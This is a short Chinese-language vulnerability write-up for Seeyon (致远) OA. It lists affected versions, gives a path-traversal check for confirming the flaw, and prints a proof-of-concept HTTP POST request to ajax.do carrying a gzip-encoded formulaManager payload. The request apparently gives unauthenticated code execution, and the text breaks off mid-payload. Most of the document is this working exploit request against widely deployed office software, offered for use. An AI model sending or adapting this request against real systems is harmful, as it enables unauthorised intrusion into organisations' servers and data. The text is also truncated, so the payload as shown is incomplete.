漏洞影响范围:
致远OA V8.0
致远OA V7.1、V7.1SP1
致远OA V7.0、V7.0SP1、V7.0SP2、V7.0SP3
致远OA V6.0、V6.1SP1、V6.1SP2
致远OA V5.x
致远OA G6
搭建环境测试:
漏洞验证:
访问/seeyon/autoinstall.do/..;/ajax.do出现下图异常,存在漏洞
抓包修改数据包
POC:
POST /seeyon/autoinstall.do.css/..;/ajax.do?method=ajaxAction&managerName=formulaManager&requestCompress=gzip HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Content-Length: 5166
Host: 192.168.0.102:8082
Connection: close
managerMethod=validate&arguments=%1F%C2%8B%08%00%C2%9C%C2%A8%C3%BB%60%00%C3%BF%C2%8DV%5B%C2%93%C2%9AH%14%7E%C3%9F%5Fa%C3%8D%C3%8BLj%C2%B2%C2%A6%05%C3%89%C2%84M%C3%AD%C3%83%C3%80H%C2%83%28%C2%A3%C2%A2%C3%9C%C2%B6%C3%B6%01%1A%04%C2%B4%C2%B9D%40%C3%85T%C3%BE%7BN%C2%A3%C2%93q6%C3%99%C2%AD%C2%B5%C3%8A%C2%82%C3%AE%3E%C3%97%C3%AF%7C%C3%A74%7F%7D%C2%BD%5D%17%C2%BB%C2%AC%C2%A1%C3%BE%C2%B2%2D%C2%A3%C3%9B%3Fz%C2%83%C3%B7%C2%BD%C2%97%1D%C3%83%C